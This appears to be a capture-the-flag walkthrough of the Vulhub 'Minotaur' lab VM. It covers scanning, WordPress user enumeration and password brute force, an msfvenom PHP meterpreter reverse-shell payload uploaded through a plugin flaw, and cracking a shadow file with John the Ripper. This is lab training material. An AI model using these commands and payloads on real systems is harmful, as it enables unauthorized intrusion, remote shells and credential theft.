SecTalks: BNE0x00 - Minotaur

From Vulhub


  • netdiscover
  • Nmap
  • Wfuzz
  • WPscan
  • msfvenom
  • John the Ripper

Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

port 22, 80 and 2020 are opening.

use wfuzz to find more locations

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null


Check the page, looks like it uses wordpress. Good. maybe I can find out some outdated wordpress plugins.

I use wpscan to find wordpress plugins vulnerabilities.

uby wpscan.rb --url

get some xss vulnerabilities and an interestig arbutrart file upload vulnerability.

next step, user enumeration.

ruby wpscan.rb --url --enumerate u

get a user name bully

next step, password guessing:

ruby wpscan.rb --url --wordlist SecLists/Passwords/passwords_john.txt threads 50

no luck this time. Let’s try harder..

we use cewl this time to generate password file

cewl -w password.txt

also john the ripper should be used to mutate the password file:

john --wordlist=password.txt --rules --stdout > out.txt

now I use wpscan to brute force the password:

wpscan --url --wordlist out.txt --username bully

Now, create php reverse shell:

msfvenom -p php/meterpreter/reverse_tcp lhost= -a php --platform php -o evil.php

based one wpscan scan result, the wordpress slideshow gallery shell upload exploit( is found. Save it as


python -t -u bully -p Bighornedbulls -f evil.php

set netcat nc -nlvp 1234


get the meterpreter

locate flag.txt and get the result /tmp/flag.txt

find a file shadow.bak in /tmp, I got some interesting things:

Looks like there are more chances to me. Download this file and use john to crack more.

john --fork=4 shadow.bak

now I have two more accounts info

use python python -c 'import pty; pty.spawn("/bin/bash")'

Login as heffer:

Login as minotaur: